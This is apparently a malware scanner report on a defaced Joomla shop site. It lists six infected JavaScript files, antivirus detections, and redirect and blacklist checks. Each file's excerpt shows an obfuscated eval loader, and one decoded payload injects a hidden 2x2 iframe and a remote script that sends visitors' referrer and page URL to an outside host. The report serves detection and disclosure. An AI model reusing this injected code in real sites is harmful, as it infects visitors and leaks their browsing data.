
Malware Scanner report for brocantic.net

Malicious/Suspicious/Total urls checked
6/0/9
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
Found
The website has probably been defaced. The following signature was found:

!--Hacked by --  (367 websites defaced)

See details below


Scanned pages/files

Request | Server response | Status
http://brocantic.net/
200 OK
Content-Length: 169992
Content-Type: text/html
suspicious
Deface/Content modification. The following signature was found: !--Hacked by --

<!--Hacked by -->





<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="" />...[209066 bytes skipped]...


http://brocantic.net/media/system/js/caption.js
200 OK
Content-Length: 3307
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 1834 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

Ikarus
JS.Trojan.JS.Iframe
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Kaspersky
HEUR:Trojan.Script.Iframer
MicroWorld-eScan
Trojan.JS.Iframe.DBV
F-Secure
Trojan.JS.Iframe.DBV
F-Prot
JS/IFrame.SJ.gen
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV

http://brocantic.net//modules/mod_ccnewsletter/assets/highslide-with-html.js/
404 Not Found
Content-Length: 959
Content-Type: text/html
clean
http://brocantic.net/test404page.js
404 Not Found
Content-Length: 959
Content-Type: text/html
clean
http://brocantic.net/templates/ja_larix/scripts/ja.script.js
200 OK
Content-Length: 7330
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

window.addEvent('domready', function(){
var vm_inputs = getElementsByClass ("addtocart_button", null, "INPUT");
var vm_inputs1 = getElementsByClass ("addtocart_button_module", null, "INPUT");
if ((!vm_inputs || !vm_inputs.length) && (!vm_inputs1 || !vm_inputs1.length)) return;
for (var i=0; i<vm_inputs.length; i++)
{
var vm_input = vm_inputs[i];
vm_input.value = "";
}

if (!vm_inputs1 || !vm_inputs1.length) return;
for (var i=
... 3410 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Iframer
F-Prot
JS/IFrame.SJ.gen
Norman
Crypt.BJLS
Commtouch
JS/IFrame.SJ.gen

http://brocantic.net/templates/ja_larix/ja_menus/ja_cssmenu/ja.cssmenu.js
200 OK
Content-Length: 2744
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

/**
 * Attaches hover handlers to every <li> inside the element with id "ja-cssmenu".
 *
 * Mouseover cancels the element's pending timer and appends "sfhover" to its
 * className when that substring is not already present. Mouseout schedules
 * sfHoverOut, bound to the element, after 20 ms and stores the timer id on
 * the element.
 */
sfHover = function () {
  var menuItems = document.getElementById("ja-cssmenu").getElementsByTagName("li");
  var index = 0;
  while (index < menuItems.length) {
    var item = menuItems[index];
    item.onmouseover = function () {
      clearTimeout(this.timer);
      if (this.className.indexOf("sfhover") < 0) {
        // NOTE(review): appended without a separating space, exactly as this
        // listing shows it; confirm against a known-clean copy of the file.
        this.className += "sfhover";
      }
    };
    item.onmouseout = function () {
      this.timer = setTimeout(sfHoverOut.bind(this), 20);
    };
    index += 1;
  }
};
function sfHoverOut() {
clearTimeout(this.timer);

... 1280 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

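Decoded script (after the file's original menu code, the injected part appends a remote script element whose URL carries the visitor's referrer and page URL, then uses document.write to emit an iframe declared 2 by 2 in size):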


function () {
var sfEls = document.getElementById("ja-cssmenu").getElementsByTagName("li");
for (var i = 0; i < sfEls.length; ++i) {
sfEls[i].onmouseover = function () {clearTimeout(this.timer);if (this.className.indexOf("sfhover") == -1) {this.className += "sfhover";}};
sfEls[i].onmouseout = function () {this.timer = setTimeout(sfHoverOut.bind(this), 20);};
}
}
var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%2
... 623 bytes are skipped ...
/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script');
I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
var O1O = document.getElementsByTagName('head')[0];
O1O.appendChild(I00);document.write(unescape(_escape));

Antivirus reports:

AVG
HTML/Framer

http://www.brocantic.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js/mootools&file[1]=mootools-release-1.11.js&subdir[2]=/js/mootools&file[2]=mooPrompt.js
200 OK
Content-Length: 58597
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

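/**
 * Fetches a page fragment over GET and replaces the target element's content
 * with it.
 *
 * @param {string|Element} el - Passed to $() to resolve the target element.
 * @param {string} url - Request URL; '&only_page=1' is appended to it.
 */
function loadNewPage( el, url ) {
  var theEl = $(el);
  var callback = {
    success : function(responseText) {
      // NOTE(review): the response is inserted as markup, so any script-bearing
      // HTML in it becomes part of the page. Callers should only pass same-site
      // URLs whose output is trusted.
      theEl.innerHTML = responseText;
      // typeof guard: a bare `if( Lightbox )` throws a ReferenceError on pages
      // where the Lightbox script was never loaded.
      if( typeof Lightbox !== 'undefined' && Lightbox ) Lightbox.init();
    }
  };
  var opt = {
    method: 'get',
    onComplete: callback.success
  };
  new Ajax( url + '&only_page=1', opt ).request();
}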
function handleGoToCart() { document.location = live_site + '/index.php?option=com_virtuemart&page=shop.cart&
... 3381 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

AntiVir
JS/iFrame.dbv
Avast
JS:Redirector-ANT [Trj]
Ikarus
JS.Trojan.JS.Iframe
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.DBV (B)
Comodo
TrojWare.JS.Iframe.HA
Kaspersky
HEUR:Trojan.Script.Iframer
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Secure
Trojan.JS.Iframe.DBV
F-Prot
JS/IFrame.SJ.gen
AVG
HTML/Framer
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV

http://brocantic.net/modules/mod_ja_vmproductslide/ja_vmproductslide/ja.vmproductslide.js
200 OK
Content-Length: 7727
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JS_Slider = new Class({

initialize: function(options)
{
this.element = this.element || null;
this.options = Object.extend({
w: 100,
h: 200,
num_elem: 4,
total: 0,
url: '',
mode: 'horizontal',
direction: 'right',
wrapper: 'ja-slide-wrapper',
duration: 1000,
interval: 3000,
auto: 1
},options||{});
... 3376 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

AntiVir
JS/iFrame.dbv
Avast
JS:Redirector-ANT [Trj]
Ikarus
Trojan.Script
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.DBV (B)
Comodo
TrojWare.JS.Iframe.HA
Kaspersky
HEUR:Trojan.Script.Iframer
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Secure
Trojan.JS.Iframe.DBV
F-Prot
JS/IFrame.SJ.gen
AVG
HTML/Framer
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV

http://brocantic.net/templates/ja_larix/scripts/vm_stuff.js
200 OK
Content-Length: 2288
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

<!--
feature_block = document.getElementById('ja-feature');
if (feature_block) {
anchors_feature = feature_block.getElementsByTagName('a');
for (i = 0; i<anchors_feature.length; ++i) {
if (anchors_feature[i].title.indexOf("Add to Cart") != -1) {
anchors_feature[i].className = "addtocart";
}
}
}

carts = document.getElementsByName('addtocart');
if (carts.length) {
for (i = 0; i<carts.length; ++i) {
carti =
... 1417 bytes are skipped ...
+));h4=_1OllOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function _1Ol(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_01I(_1Ol(O0l)));

Antivirus reports:

AntiVir
JS/iFrame.dbv
Avast
JS:Redirector-ANT [Trj]
Ikarus
Trojan.Script
nProtect
Trojan.JS.Iframe.DBV
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.DBV (B)
Comodo
TrojWare.JS.Iframe.HA
Kaspersky
HEUR:Trojan.Script.Iframer
NANO-Antivirus
Trojan.Script.Redirector.bqiube
F-Prot
JS/IFrame.SJ.gen
AVG
HTML/Framer
Norman
Crypt.BJLS
GData
Trojan.JS.Iframe.DBV
Commtouch
JS/IFrame.SJ.gen
BitDefender
Trojan.JS.Iframe.DBV


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: brocantic.net

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 10:07:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 Jan 2015 10:07:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: analytics=true; expires=Fri, 15-Jan-2016 10:07:26 GMT; path=/
Set-Cookie: 32b3ca9cf32810a0be2283fe33d67d1f=s9sukp01guk4lbg4ku3k4o6g00; path=/
Set-Cookie: virtuemart=s9sukp01guk4lbg4ku3k4o6g00
Set-Cookie: ja_larix_tpl=ja_larix; expires=Tue, 05-Jan-2016 10:07:26 GMT; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: brocantic.net
Referer: http://www.google.com/search?q=brocantic.net

Result:
The result is similar to the first query. No suspicious redirects were found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=brocantic.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brocantic.net/

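Result: brocantic.net is not infected or malware details are not published yet.

Note: neither blacklist result means the site is clean. They only show that these services had not listed it at scan time, while the file-level findings above still stand.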